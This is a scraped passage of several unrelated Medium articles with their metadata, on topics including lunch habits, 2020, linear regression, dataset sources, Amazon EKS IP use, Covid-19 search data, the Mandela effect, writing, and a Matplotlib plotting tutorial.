afternoon to keep me awake and perform my tasks. The additional boost of energy also created for me the illusion of adding more hours to the day, as it meant I was more active on more hours than I was used to having. These days, I’m an evangelist for light lunch regimens. Besides the occasional burgers and burritos that I dig into during my photoshoot days, I consistently stick to modest lunch portions while ensuring my macronutrient balance is still kept on check. If you’re a fan of heavy lunches like I was, and feel the subsequent lethargy take a huge toll on your afternoons, you should definitely try switching to this routine and see the changes it brings to your office table. This last piece may be a bit of a long-shot, but if you really capitalise on your enhanced productivity, perhaps you’ll impress your employers and see yourself bringing home an additional wad of cash every month. Now that’s a true hack.
https://jonathanoei.medium.com/how-to-hack-your-lunch-8ea89e588ef9
['Jonathan Adrian']
2020-02-04 03:25:13.559000+00:00
['Self Improvement', 'Business', 'Health', 'Productivity', 'Nutrition']
2020 Isn’t the Problem
When the news broke that Supreme Court Justice Ruth Bader Ginsburg had died, the instant outpouring of grief on social media was immediately followed by an outpouring of condemnation. Of a single 12-month period of time. It all amounted to: “2020 is the Worst. Year. Ever.” This year has been a steady stream of devastating wildfires, political disasters, mass whale beachings, near brushes with World War III, a global pandemic, police brutality, and a growing awareness on the part of White Americans that we didn’t actually fix racism by watching Get Out and reading half of Between the World and Me. And although no one is actually blaming 2020 for what’s happening in 2020, we are using it as a scapegoat. Declaring 2020 the worst year ever is a form of collective commiseration that gives a name to a difficult experience and makes us feel less alone. It’s a coping mechanism. But for many of us, it’s becoming less effective and more dangerous all the time. Blaming the year has become a convenient container into which we can stash every difficult truth and terrible event. It’s a way to distance ourselves from the moment. We’re choosing to believe that everything that is difficult will pass when the calendar changes. It won’t, obviously. At 12:01 a.m. on January 1, 2021 people will still be living in poverty. Racism will still threaten the lives and livelihoods of Black Americans. Our health care system will still be inadequate, and climate change will still be coming for us. All of these things will continue to be propped up by choices we make on a daily basis, and by the choices of the people we elect. The year is not the problem. We are. Which means we can do something about it. What the real problem is Every time you catch yourself falling into the 2020 trap, take a moment to look inside the container. What’s your reaction to learning that in normal times, 35 million Americans experience food insecurity, a number that has risen dramatically this year? That the wildfires in California and Oregon have released at least 83 million metric tons of carbon into the atmosphere? That Black Americans are two to three times more likely to die from Covid than White Americans? To the news that the police officers who shot and killed Breonna Taylor in her own bed will not be charged with a crime? For each of these problems, ask: Collectively, what story are we telling ourselves about it? Why the hell did this happen? What can we learn about it? What can you do about it? Turn the tic of rolling your eyes and saying “cuz 2020” into a mission to more fully understand the world. What many of us are experiencing more deeply than usual right now is instability. We’re used to making plans and having them mostly work out. We research preschools and make elaborate grocery shopping lists for project cooking. Now we’re left scrambling to figure out how the hell we’re going to take care of our children and keep our jobs, or stay healthy and not go insane from isolation, or when we can see our families who live a plane ride away. The fact that these things are unusual for us is an opportunity for reflection. For a huge, often unacknowledged, portion of the world, this volatility is normal In 2018, glaciologists from the University of Maine concluded that in the year 536 A.D. an Icelandic volcano erupted, plunging most of the Western and Northern Hemispheres into a foggy near-darkness for at least 18 months. Crops failed, people starved, more eruptions followed, and the Plague of Justinian wiped out something like a third of the Holy Roman Empire. Life was extremely unpleasant for about a century afterward. This revelation inspired a spate of articles ranking the worst years in history—with hot takes from historians on horrible times to be alive. While 536 has a clear edge, other generally very Eurocentric nominations include 1348, at the height of the plague in Europe, and 1492, when Christopher Columbus landed in the New World and laid the groundwork for the genocide of indigenous people and the trans-Atlantic slave trade. Years during the American Civil War and WWII were also mentioned, and as well as 1918, the beginning of the Spanish Flu pandemic that killed more than 50 million people worldwide, an almost inconceivable loss of life. Contagion. War. Natural disasters. None of these are conducive to a high quality of life. Only a masochist would actively choose to live through such events. The pandemic, though, had been like a black light shining on the hotel bedspread of modern life — we now cannot deny what we previously low-level suspected, and now that we know, we’re sure having trouble sleeping soundly. But we’re not truly that surprised. The instinct to blame it all on 2020 can be harnessed Everyone alive today is descended from humans who survived some serious shit. Some of us have clearly fared better than others — we’re still grappling with the legacy of that, and in some ways, we’re just starting. But we also have more and different tools now than in 536 or 1943 or 1968. The same technology that allows you to read a profanity-riddled pep talk from a stranger on your pocket computer when you should probably be sleeping or talking to an actual human makes it possible to connect to people around the world, research almost anything, coordinate a protest, start a letter-writing campaign — connect. When Ginsburg started law school in 1956, just over a generation of women had had the right to vote. She could make the Harvard Law Review but she couldn’t have her own credit card or mortgage. That didn’t change by saying #1956istheworst. It changed one decision, one argument, one job title at a time. No matter who wins the election, no matter if a safe and effective vaccine becomes available next week, we have a challenging road ahead. The clarity we’ve gained, the rapid change we’ve adapted to though, the realization that our individual and collective decisions matter — all of it means that we do have the power to make 2025 or 2040 the best year ever, for the most people ever.
https://forge.medium.com/2020-isnt-the-problem-f5464024b5fc
['Annaliese Griffin']
2020-09-25 05:32:57.443000+00:00
['Grief', '2020', 'Culture', 'Society', 'Future']
Linear Regression
Regression analysis is one of the most important fields in statistics and Fig 1 — Regression machine learning. There are several regression methods available. Linear regression is one of them. Regression searches for relationships among variables. In statistical modeling and in Machine learning that relationship is used to forecast the result of further or future event. Linear Regression Linear regression is probably one of the most important and widely used regression techniques. It’s among the simplest regression methods. One of its main advantages is the ease of interpreting results. Linear regression tries to form the relationship between two variables by making a linear equation to observed data. One variable is considered to be an descriptive variable, and the other is considered to be a dependent variable. Fig 2 — Linear Regression relation between x and y Simple Linear Regression: Simple linear regression is the simplest case of linear regression with a single independent variable, 𝐱 = 𝑥. Multiple Linear Regression: Multiple linear regression is a case of linear regression with more than one independent variables. Polynomial Regression: Polynomial regression is a generalized case of linear regression. One assumes the polynomial dependence between the output and inputs and, consequently, the polynomial estimated regression function. Implementing Linear Regression in Python Fig 3 — Linear Regression in Python Python Packages for Linear Regression: The package NumPy is a fundamental Python scientific package that allows many high-performance operations on single- and multi-dimensional arrays. It also offers many mathematical routines. It is open source. The package scikit-learn is a widely used Python library for machine learning, built on top of NumPy and some other packages. It provides the means for preprocessing data, reducing dimensionality, implementing regression, classification, clustering, and more. Like NumPy, scikit-learn is also open source. Simple Linear Regression with scikit-learn : Let’s start with the simplest case, which is simple linear regression. There are five basic steps when you’re implementing linear regression: Import the packages and classes that are needed. Provide the data to work with and then do appropriate changes. Create a regression model and fit it with existing data. Check the results of model fitting to know whether the model is satisfactory or not. Apply the model for predictions. Lets see an example where we predict the speed of a 10 year old car. Import the modules needed. Fig 4 — Importing the needed modules Create the arrays that represent the values of the x and y axis: Fig 5 — values of x and y Execute a method that returns some important key values of Linear Regression: Fig 6 — A method to return key values Create a function that uses the slope and intercept values to return a new value. This new value represents where on the y-axis the corresponding x value will be placed: Fig 7 — Define a Function Run each value of the x array through the function. This will result in a new array with new values for the y-axis: Fig 8 — Run x through the function Draw the original scatter plot: Fig 9 — Scatter Plot Draw the line of linear regression: Fig 10 — Line of linear regression Display the diagram: plt.show() Fig 11 — Screenshot of the code with output. Conclusion: Linear Regression is easy to implement and easier to interpret the output coefficients.When you are aware that the relationship between the independent and dependent variable have a linear relationship, this algorithm is the best to use due of it’s less complexity compared to other algorithms.Linear Regression is a great tool to analyze the relationships among the variables but it isn’t recommended for most practical applications because it over-simplifies real-world problems by assuming a linear relationship among the variables.
https://medium.com/analytics-vidhya/linear-regression-4a8054576241
['Sruti Samatkar']
2020-12-13 16:33:53.560000+00:00
['Machine Learning', 'Matplotlib', 'Python', 'Linear Regression', 'Numpy']
Best Data Sources for Data Scientists
Database is the information you loose when your memory crashes — Dave Barry Introduction According to Wikipedia, a dataset or data set is collection of data. In the open data discipline , the dataset is the unit to measure the information released in a public open data repository. The most common format for datasets we will find online are in the form of csv and spreadsheets where the data is organized in tabular form. In the case of tabular data, a data set corresponds to one or more database tables , where every column of a table represents a particular variable, and each row corresponds to a given record of the data set in question. The data set lists values for each of the variables, such as height and weight of an object, for each member of the data set. Each value is known as a datum. Data sets can also consist of a collection of documents or files. The data present in the dataset can be in the form of images, videos, audio files, numerical data or textual data and are stored in different formats. It is not necessary that there should be only one file , the dataset can be in the form of zip file or folder containing multiple data tables with related data. How the Datasets are created ? The datasets are created in multiple ways. They have been collected through surveys. Some of the data are recorded from human observation. Data can also be scrapped from websites or pulled via API’s. Even data can also be machine generated data. It’s always important to understand that how was this dataset created ? Where does this dataset comes from? It’s always recommended to understand the data we are working from with. Where to find datasets ? Some of the most commonly used datasets sources are listed below and are used by the data scientists :- 1. Kaggle Kaggle, a subsidiary of Google LLC, is an online community of data scientists and machine learning practitioners. It is a place where you can learn, practice and fine tune our data science and analytics skills. There are lot of open , public data and allow users of the platform to share codes so that we can learn best practices within the data space. Link :- https://www.kaggle.com/datasets 2. UCI Machine Learning Repository University of California Irvine hosts 440 data set as a service to the ML community. These data sets are good , cleaned and can be used for the analytics and modelling purpose. Link: http://archive.ics.uci.edu/ml/index.php 3. Google Public datasets Google Cloud Public Datasets facilitate access to high-demand public datasets, making it easy for you to access and uncover new insights in the cloud. By analyzing these datasets hosted in BigQuery and Cloud Storage, you can seamlessly experience the full value of Google Cloud with ease. Google lists all the datasets on a page. On google cloud platform (GCP) , you can query using BigQuery to explore the datasets. We will need to sign up for the GCP account Link: cloud.google.com/bigquery/public-data/ 4. FiveThirtyEight FiveThirtyEight, sometimes rendered as 538, is a website that focuses on opinion poll analysis, politics, economics, and sports blogging. It is an interactive news and sports site that has some exceptional data visualizations. They make lot of data in open for the public view, meaning that we can download and play with the data ourself Link: https://data.fivethirtyeight.com/ 5. Buzzfeed News It makes the data sets, analysis , libraries , tools , and guides used in it’s article available on Github. Check them out to learn from some of the best Link: github.com/BuzzFeedNews 6. data.world data.world’s cloud-native data catalog makes it easy for everyone — not just the “data people” — to get clear, accurate, fast answers to any business question.A data catalog is a metadata management tool that companies use to inventory and organize the data within their systems. Typical benefits include improvements to data discovery, governance, and access. Link:https://data.world/ 7. Socrata Socrata hosts cleaned open source data sources ranging from the government , business, and education data sets. The Socrata Open Data API allows you to programmatically access a wealth of open data resources Link: https://opendata.socrata.com/ 8. Awesome public datasets This Github hosts a library of awesome, public datasets . They are sorted by category and link us straight to the hosting website. Link: github.com/awesomedata/ 9. Quandl Quandl is a marketplace for financial, economic and alternative data delivered in modern formats for today’s analysts, including Python, Excel, Matlab, and R. Some of the datasets are available for free and some can be purchased. Link: https://www.quandl.com/search 10. Data.gov It allows us to download and explore data from US government agencies. Data can range from government budgets to climate data. The data is very well documented so it becomes easy to navigate through the resources. Link: https://www.data.gov/ 11. Academic Torrents It is a site that is geared around sharing the datasets from scientific papers. We can browse the data sets directly from the website and can also download it . Link: http://academictorrents.com/browse.php 12. AWS Public Data sets Amazon has a page that lists all the data sets for us to browse. We need an aws account for this and amazon also gives free access tier for the new accounts. Link: https://aws.amazon.com/datasets Some other repositories Jeremy Singer-Vine Wikipedia Data Sets World Bank Data Sets Reddit — /r/datasets NASA Datasets Twitter Dataset via Twitter API Github Dataset via Github API CERN Open Data Portal Global Health Observatory Data Repository References : — Machine Learning India — 11 websites to find free, interesting datasets: interviewqs.com. — 21 Places to Find Free Datasets for Data Science Projects: www.dataquest.io. Hope you liked this information Thanks , Saurav Anand
https://medium.com/datadriveninvestor/best-data-sources-for-data-scientists-ae742b42b457
['Saurav Anand']
2020-10-26 10:20:30.536000+00:00
['Data Analysis', 'Artificial Intelligence', 'Computer Vision', 'Data Science', 'Machine Learning']
Amazon EKS Is Eating My IPs!
What Has Happened to the IP Allocation? Interesting! An empty two-node cluster has used up 62 IP addresses. Let’s work out why! Access config Set up our EKS cluster kubeconfig so we can use kubectl to investigate. I already have the AWS CLI configured. aws eks --region eu-west-2 update-kubeconfig --name test What is deployed? The two nodes will take two IPs from the cluster. What is deployed inside the cluster then? kubectl get pods -A There are six pods running. These are DaemonSets and Deployments that are EKS add-ons used to make the cluster function correctly. OK, cool. So, that’s a total of eight IPs we think should be in use. What about the other 54? We don’t have any other workloads in the cluster. There are no Load Balancers eating up space. There are no out-of-cluster resources like EC2, databases, VPC endpoints, etc. What sort of AWS magic is going on here? The answer lies in how EKS manages networking.
https://medium.com/better-programming/amazon-eks-is-eating-my-ips-e18ea057e045
['Nick Gibbon']
2020-07-19 14:23:19.567000+00:00
['Kubernetes', 'DevOps', 'AWS', 'Software Development', 'Programming']
Google Searches Reveal Covid-19 Hot Spots Before Governments Do
Google Searches Reveal Covid-19 Hot Spots Before Governments Do What Google searches reveal that governments won’t A healthcare worker talks to people in line at a United Memorial Medical Center Covid-19 testing site in Houston, Texas, June 25, 2020. Photo: Mark Felix/Getty Images Anosmia — the inability to smell — is an indicator of Covid-19 infection. According to data from 2.5 million users of the COVID Symptom Study app developed at King’s College London, two-thirds of users who tested positive for Covid-19 reported anosmia, compared to just a fifth of those who had tested negative. Meanwhile, tens of thousands of people every day are turning to Google for answers to why they suddenly can’t smell. So is there a correlation between Google searches for “I can’t smell” and positive case rates of Covid-19? Yes. Research shows that anosmia searches almost perfectly matched outbreaks in New York, New Jersey, Louisiana, and Michigan. Outside the U.S., searches peaked with outbreaks in Italy, Spain, Brazil, and the U.K. And a model built by UCL computer scientist Bill Lampos and team shows that Google searches predict Covid-19 case volumes up to 14 days ahead. Among the most predictive are searches for anosmia. So anosmia Google searches can predict outbreaks of Covid-19, but can they prevent them? That depends on how fast you could get the data. If you wanted to use Google searches to get ahead of a Covid-19 outbreak, you would need real-time data. On June 5, for the first time, Houston overtook NYC in anosmia searches. According to the CDC, patients develop symptoms from anywhere between two days to two weeks. This means you only have 14 days to get in front of the outbreak and you need to know who is Googling “I can’t smell” as the searches happen. You’d also want to know the exact number of people who are telling Google they can’t smell. Not an estimate, or an aggregate (such as you get with Google Trends). One way to get this real-time data, while also getting an accurate number of searches, is to buy the keyword “I can’t smell” in Google Ads, Google’s online advertising platform. Within Google Ads, you would write up a basic ad about anosmia (or better yet, use language from an authoritative source that provides information about anosmia). Lastly, you would choose the location you want to pull “I can’t smell” search data from. From there, your ad will serve on the Google results page of every person who is Googling “I can’t smell” in the location you told Google you wanted to target. Whether the searcher clicks your ad or not, their “impression” — an indication that a search for “I can’t smell” was conducted — will be counted in Google Ads. And the data will populate in Google Ads within an hour of someone searching. Here’s a chart of everyone located in the 250 most populated U.S. cities who has Googled “I can’t smell” since April 23 (Y-axis is the number of searches): I have this data because, since April 23, I’ve been buying the keyword “I can’t smell” in Google Ads and targeting searchers located in the top 250 U.S. cities by population. The chart is kind of hard to read. So let’s plot the same data on a map of the U.S.: You can see on the area chart that searches for “I can’t smell” were mostly from New York City and Chicago in late April and early May — two of the cities hardest hit by Covid-19 during that time. You can also see an uptick in searches from Houston and Dallas, Texas, starting in June. On June 5, for the first time, Houston overtook NYC in anosmia searches. (Since June 13, Houston has the highest searches among the top 250 most populated U.S. cities.) Here’s a chart comparing anosmia searches in Houston with positive case rates, during the first three weeks of June: (Anyone who has a few hours to dedicate to YouTube tutorials about Google Ads can do this, too.) I started buying anosmia keywords because I wanted to learn more about people in regions that were (then) in lockdown. But a couple of weeks into the experiment, I realized this method of data mining can also be used to learn more about regions where data is in lockdown. That is, buying keywords and serving ads to a populace can reveal which countries’ governments are lying to their citizens (or the world). Not only about Covid-19, but any topic. The government is hiding the number of deaths, this is 100 percent proven. How many [they’re hiding] is more difficult to say. [They have] completely controlled the data so we haven’t been able to access independent information on what’s really going on. — Zitto Kabwe, leader of the ACT-Wazalendo opposition party Tanzania, in West Africa, has reported just 509 cases of coronavirus since May 8, 2020. Since then, it has not reported a single case. If Google searches about anosmia correlate with, and can predict, Covid-19 infection, and if anosmia is the most common symptom of Covid-19, then we should expect anosmia searches conducted by Tanzanians to be infrequent if there really have been no new infections since May 8. Yet the same week that the Tanzanian government stopped reporting numbers, Tanzania had the second-highest Google search volume globally for anosmia. Soon there were on-the-ground reports of overflowing hospitals and night burials. Critics accused the Tanzanian government of failing to inform the public of the true extent of infections and deaths. To try to get the real story directly from Tanzania’s citizens, starting on the day the Tanzanian government went dark, I bought anosmia keywords, this time targeting ads to the entirety of Tanzania. Here is the corresponding heat map for all regions in Tanzania. On average, 93 English speakers in Tanzania made anosmia Google searches per day between May 8 and May 31, 2020. One quirk of the Google Ads system is you can’t serve ads to people who have their web browsers set to the KiSwahili language. Roughly 12.15 Tanzanians speak KiSwahili for every one person who speaks English. Meanwhile, Google has data on just 5.1% of the country’s devices. So the actual number of anosmia searches being conducted in Tanzania is actually closer to ~1,824 per day. Google is withholding (at least) 94.9% of the data for these campaigns, so I multiply daily searches by 19.61 to get a rough projection of the searches I should be receiving. To put this in perspective, between May 8 and May 31 there were 3,275 anosmia searches from NYC and 18,143 reported cases. The search to case ratio was 1:5.5. In Chicago, there was a search to case ratio of 1:4 during that same time period. In D.C.: 1:1.96. In most of the U.S. cities I targeted, I saw that cases were 1.75–6X anosmia searches. Roughly 1,824 anosmia searches were being conducted from Tanzania every day since May 8. This is not an apples to apples comparison, because I am not counting more ambiguous anosmia-related searches, such as “loss of smell,” in the U.S., and there’s also no way to know for certain how much data Google has on individuals vs. devices in a given region. Nevertheless, I estimate the number of actual Covid-19 cases happening in Tanzania every day in May was in the low four figures. It could be lower. But there can’t be zero cases. “Nowcasting” is the tracking of the spread of illness using Google searches. It’s a technique that works, as Bill Lampos’ model shows. It’s a technique that’s also failed. Google Flu Trends, the first and best-known nowcasting tool, stopped working after three years. It failed to predict the peak of the 2013 flu season. “However, the most helpful conclusion to draw is not that search data analysis is unreliable,” Sam Gilbert writes. “But that it’s a complement to other methods and not a replacement for them.” One model I’m keeping an eye on is run by the MRC Centre for Global Infectious Disease Analysis at Imperial College London. The model estimates the true number of infections in Tanzania during the four weeks between April 29 and May 26, 2020 to be 24,869. Google searches can be a flare to signal observers outside of the black box. Even if it turns out that anosmia-related searches fail to predict Covid-19 infection, I don’t think we should allow the sentiment that took hold after the failure of Google Flu Trends to take hold again. This isn’t the time to be bearish on nowcasting. Because people are turning to Google more than ever to tell it things they tell no one else. And more than ever we need the best option we have available to cut through obfuscation and understand the censored by intercepting their thoughts, fears, hopes (or symptoms). If a government wants to lock down their data — prevent the real story from being learned by their citizens, or the rest of the world — they will have to ban Google outright. Not because their citizens might use Google to research unbiased information, but because Google searches can be a flare to signal observers outside of the black box. “Advertising ceases to be advertising when it answers a question.” This is a motto that colleagues of mine, who resented the fact that they were marketers, but who used Google Ads for commercial applications (to sell people products and services they didn’t need), would tell themselves so they could feel better about their work. When you ask Google a question about reviews on a new sneaker, or about what phase of lockdown you’re currently in, or about a strange symptom you’re suddenly experiencing, the first result on your search results page is an ad, technically. It’s also an answer. It’s also many other things.
https://onezero.medium.com/google-searches-reveal-covid-19-hot-spots-before-governments-do-b689b3008ac1
['Patrick Berlinquette']
2020-07-14 12:22:09.229000+00:00
['Covid 19', 'Coronavirus', 'Google', 'Public Health', 'Data']
Which Image Is Right?. Are we in an alternate reality or does…
Possible Explanations for Mandela Effects Alternate Realities One theory about the basis for the Mandela effect originates from quantum physics and relates to the idea that rather than one timeline of events, it is possible that alternate realities or universes are taking place and mixing with our timeline. In theory, this would result in groups of people having the same memories because the timeline has been altered as we shift between these different realities. False Memories Before we consider what is meant by false memories, let’s look at an example of the Mandela effect as it will help us to understand how memory can be faulty (and may lead to the phenomenon that we are describing). Who was Alexander Hamilton? Most Americans learned in school that he was a founding father of the United States of America but that he was not a president. However, when asked about the presidents of the United States, many people mistakenly believe that Hamilton was a president. Why? If we consider a simple neuroscience explanation, the memory for Alexander Hamilton is encoded in an area of the brain where the memories for the presidents of the United States are stored. The means by which memory traces are stored is called the engram and the framework in which similar memories are associated with each other is called the schema. So when people try to recall Hamilton, this sets off the neurons in close connection to each other, bringing with it the memory of the presidents. (Though this is an oversimplified explanation, it illustrates the general process.) When memories are recalled, rather than remembered perfectly, they are influenced to the point that they can eventually become incorrect. In this way, memory is unreliable and not infallible. Memory-Related Concepts This leads to the likelihood that problems with memory, and not alternate universes, are the explanation for the Mandela effect. In fact, there are a number of subtopics related to memory that may play a role in this phenomenon. Here are a few possibilities to consider:
https://medium.com/random-awesome/which-image-is-right-d67e758ca471
['Toni Tails']
2020-12-11 15:37:17.437000+00:00
['Humor', 'History', 'Marketing', 'Psychology', 'Art']
The Best Software Engineering Books I Read in 2020
The Best Software Engineering Books I Read in 2020 A software engineer’s reading list Photo by Thought Catalog on Unsplash. As 2020 draws to a close, I am thrilled to share with you a selection of the best software engineering books that I have read during the past 12 months. If you are a software engineer, data scientist, or one of those people who work in the tech or software industry, you will agree with me that you have to constantly keep learning if you are to remain relevant in the game. When you decide to become a software engineer, you essentially sign up for a journey of lifelong learning. There are many ways of learning or acquiring knowledge, but books still remain a dominant force in that sphere.
https://medium.com/better-programming/the-best-software-engineering-books-i-read-in-2020-8bf9dee61111
['Mwiza Kumwenda']
2020-12-28 16:36:35.924000+00:00
['Programming', 'Software Development', 'JavaScript', 'Books', 'Software Engineering']
Feeling Good About Writing is a Good Enough Reason to Keep Going
Writing isn’t like eating croissants. It isn’t like pancakes or waffles or whatever your decadent pleasure. There’s no need to feel guilty about enjoying writing for the sake of writing. You don’t need to make a lot of money from your writing to be worthy of writing. Earlier this year, my family and I visited Paris, and I ate more croissants than I could count. It made me want to run a 5K every day. This is a natural reaction — extreme or not — to an overindulgence issue. But when I overindulge in writing (if that even exists), there’s no such feeling unless outside circumstances have pushed me to feel this way. Meaning, I’ve allowed either someone or something to tell me that writing for enjoyment isn’t enough. That I should push for more based on not my own values, but someone else’s. In marketing, there’s a term called KPI, which means key performance indicators. As a good marketer, you define your KPIs and measure them based on your goals for implementing your marketing strategy. As a writer, you define your personal KPIs based on your goals. Many writers who enjoy writing end up quitting altogether because they haven’t properly defined their goals. Or they’ve become attached to goals that don’t align with what they truly value.
https://medium.com/2-minute-madness/feeling-good-about-writing-is-a-good-enough-reason-to-keep-going-c67448fd82b
['Brandon B. Keith']
2020-11-13 18:43:51.740000+00:00
['Writing Tips', 'Writing', 'Self', 'Art', 'Creativity']
The Best of Better Programming (10/31–11/13/2020)
Jobs from Better Programming Jobs Our job board is launching very soon for your company to hire through us but this week we have two exciting opportunities from the Better Programming Staff! Better Programming's Co-Founder and Publisher is looking for a Ruby or Rails Engineer: * First, Tony Stubblebine is looking for a "I'm looking for a programmer to work on a side project with me to help put self-published books on to Medium. Will pay normal $ + split profit on the tool." More details about the project can be found here: https://coachtony.medium.com/epub-to-medium-daf8ae8431f1 --- * Second, Better Programming is looking for a substitute Editor-in-Chief for Late January-March: My wife and I are expecting our first child at the end of January, so I'm looking for someone with a technical background and some editorial experience to fill in for me while I take paternity leave. If interested, email me @ [email protected] with your engineering and editorial qualifications. This is a paid opportunity. --- Jobs are free to post and $100 to promote to our email list of 75,000+ job seekers. Want to post your company's job with Better Programming Jobs? Just fill out our Typeform here. and $100 to promote to our email list of 75,000+ job seekers.
https://medium.com/better-programming/the-best-of-better-programing-10-31-11-13-2020-51b70d16dac
['Zack Shapiro']
2020-11-13 18:36:55.323000+00:00
['Startup', 'JavaScript', 'Software Development', 'Python', 'Programming']
Atlas — Neural Network Reconstructing a 3D Scene From Image 📸
Limitations of past models Traditional approaches to the 3D reconstruction task rely on the intermediate representation of depth maps before predicting the full 3D model of the scene. The researchers hypothesized that direct 2D to 3D prediction without an intermediate step would yield more accurate results. How the proposed approach works The input of the model is 2D images of the scene. 2D CNN extracts features from each input image separately. These features are projected and accumulated in voxels. After 3D accumulation, CNN refines the accumulated features and predicts the truncated signed distance function (TSDF) values. In addition, semantic segmentation of the reconstructed 3D model is carried out without significant additional calculations.
https://medium.com/deep-learning-digest/atlas-neural-network-reconstructing-a-3d-scene-from-image-d8422c135d81
['Mikhail Raevskiy']
2020-09-01 13:21:13.189000+00:00
['Deep Learning', 'Machine Learning', 'Data Science', 'Artificial Intelligence', 'AI']
There are Only Two Jobs You Can Do From Your Bed
Here are some writers and authors who did great work and even preferred writing in bed: 1. Marcel Proust Shanghai Noir Marcel Proust writing in bed “It is pleasant, when one is distraught, to lie in the warmth of one’s bed, and there, with all effort and struggle at an end, even perhaps with one’s head under the blankets, surrender completely to howling, like branches in the autumn wind.” 2. Truman Capote “I am a completely horizontal author,” said the author of In Cold Blood and Breakfast at Tiffany’s, “I can’t think unless I’m lying down, either in bed or stretched on a couch and with a cigarette and coffee handy.” Truman Capote writing in bed Copyright getty image 3. William Wordsworth The Romantic poet apparently preferred writing his poems in bed in complete darkness, starting over whenever he lost a sheet of paper because looking for it was too much effort. 4. Mark Twain “Just try it in bed some time,” the author told the New York Times in 1902. “I sit up with a pipe in my mouth and a board on my knees, and I scribble away. Thinking is easy work, and there isn’t much labor in moving your fingers sufficiently to get the words down.” 5. James Joyce The Irish author wrote lying down on his stomach — which doesn’t seem like the most comfortable position. 6. George Orwell The dying George Orwell used to prop his typewriter up in bed and hammer away at the final draft of 1984. The doctor who treated him in Glasgow said all he could remember was the sound of typing and the fog of cigarette smoke in Orwell’s bedroom.
https://medium.com/writing-heals/there-are-only-two-jobs-you-can-do-from-your-bed-9f1a5fd9bf38
['Michelle Monet']
2019-11-09 17:11:29.314000+00:00
['Writing Life', 'History', 'Writing', 'Creativity', 'Art']
People first: Aurélien Nicolas (Deckard AI)
“AI for Software Engineering Process Management” is another one filed of using Artificial Intelligence for Software Engineering. This time we prepared the interview with Aurélien Nicolas, CTO at Deckard AI, an expert in this Subject Matter, to share a bit about his technical background, personal motivation and profession vision.
https://medium.com/ai-for-software-engineering/people-first-aur%C3%A9lien-nicolas-deckard-ai-3a1768ff9d93
['Aiforse Community']
2017-10-27 07:07:35.514000+00:00
['Machine Learning', 'Project Management', 'Software Development', 'Artificial Intelligence', 'People']
Starting off with Visualization in Python — Matplotlib
First step as always is to import all the required libraries. import matplotlib.pyplot as plt import numpy as np from random import sample %matplotlib inline Lets generate some data for the plotting exercise and plot a simple line plot. x = np.linspace(0,10,20)#Generate 20 points between 0 and 10 y = x**2 # Create y as X squared plt.plot(x,y) # Plot the above data Figure 1 Plotting the above figure requires only a single line command. While it is simple, it does not mean we don’t have the option to customize it. plt.plot(x, y, color='green', linestyle='--', linewidth=2, alpha= 0.5) Figure 2 The parameters passed within the plot command control for: ‘color’ indicates the colour of the line and can be given even as a RGB hex code ‘linestyle’ is how you want the line to be, can be ‘ — — ’ or ‘-.’ for dash dotted line ‘linewidth’ takes an integer input for indicating the thickness of the line ‘alpha’ controls the transparency of the line Sometimes a line might not be enough, you might need to even indicate which are the exact data points, in such cases you can add markers plt.plot(x, y, marker = 'o', markerfacecolor = 'red', markersize = 5) Fig 3 This plot has red coloured round markers. These markers can further be customized by modifying their boundaries. plt.plot(x, y, marker = 'o', markerfacecolor = 'red', markersize = 10, markeredgewidth = 2, markeredgecolor = 'black') Fig 4 The markers are same as before, but now they have a black boundary. The parameters for controlling the markers are: ‘marker’ indicates what shape you want the marker to be, can be ‘o’ ,‘*’ or ‘+’ ‘markerfacecolor’ indicates the colour of the marker ‘markersize’ similar to linewidth controls the size of the marker ‘markeredgewidth’ and ‘markeredgecolor’ are used for specifying the boundary thickness and colour respectively. Lets combine all of the above together into one plot: Figure 5 Not the prettiest of plots, but you get the idea. While this covers the basics of plotting data, there is still a lot more to be done is terms of titles, range of axes, legends etc. The easiest way to do this is via the use of Matplotlib’s object oriented method. Object Oriented method Matplotlib has an object oriented API which allows you to create figure and axes objects. These objects can then be called in an orderly manner to perform functions such as plotting the data or customizing the figure. fig, ax = plt.subplots() Fig 6 The above command returns the figure and axis objects and creates an empty plot. This can then be used to recreate the above plot with the plot and axes titles and the legend. fig, ax = plt.subplots()#Create the objects ax.plot(x,y,label = 'X squared')#The data to be plotted and legend ax.set_title('Plot 1')#Plot title ax.set_xlabel('X')#X axis title ax.set_ylabel('Y')#Y axis title ax.set_xlim(0,10)#Range of X axis ax.set_ylim(0,110)#Range of Y axis plt.legend()#Command to display the legend Fig 7 The above plot(Fig 7) has the axes and plot titles, legend and different ranges for the X and Y axes. Plotting Multiple lines Suppose you want to compare two different sets of data, i.e, by plotting multiple lines in the same figure. In that case all you need to add is one more plot command. fig, ax = plt.subplots()#Create the objects ax.plot(x,y,label = 'X squared')#The data to be plotted and legend ax.plot(x,x**3,label = 'X cubed')#The data to be plotted and legend ax.set_title('Plot 1')#Plot title ax.set_xlabel('X')#X axis title ax.set_ylabel('Y')#Y axis title ax.set_xlim(0,10)#Range of X axis ax.set_ylim(0,110)#Range of Y axis plt.legend()#Command to display the legend Fig 8 Another way of comparing would be to show two different plots side by side. fig, ax = plt.subplots(1,2)#Create the objects ax[0].plot(x,y,label = 'X squared')#The data to be plotted and legend ax[1].plot(x,x**3,label = 'X cubed')#The data to be plotted and legend ax[0].set_title('Plot 1')#Plot title ax[1].set_title('Plot 2')#Plot title ax[0].legend()#Command to display the legend for plot 1 ax[1].legend()#Command to display the legend for plot 2 plt.tight_layout()#To ensure no overlap Fig 9 This is done by first passing in the number of plots in the ‘subplot()’ function. The (1,2) above means that there should be 1 row of plots and 2 columns of plots, in effective meaning 2 plots. The functions are repeated for each one of the plots and the ‘tight_layout()’ command ensures that there is no overlap. A small change here being the command to display the legends. The plot.legend() function displays the legend only for one plot, to display for both you need to specify it for each plot. The third way of comparison would be to use an inset plot. Within a larger plot, have a smaller plot. fig, ax = plt.subplots(figsize = (12,4)) axins = ax.inset_axes([0.1,0.6,0.4,0.3] )#Left, Bottom, Width, Height ax.plot(x,y,label='X squared')# Main plot axins.plot(x,1/x,label='X inverse')# Inset plot ax.set_xlabel('X')#X axis title ax.set_ylabel('Y')#Y axis title axins.set_xlabel('X')#X axis title axins.set_ylabel('Y')#Y axis title ax.set_title('Main Plot')#Main plot title axins.set_title('Inset Plot')# Inset plot title ax.legend()#Legend for main plot axins.legend()#Legend for inset plot Fig 10 The ‘figsize’ parameter within the ‘subplots()’ function allows to change the size of the figure. The ‘inset_axes’ function is used to create the inset plot while also specifying the location and size. The first two numbers specify the plot location in terms of percentage. In the above case, the first two numbers 0.1 and 0.6 specifies that the plot should be 10% to the 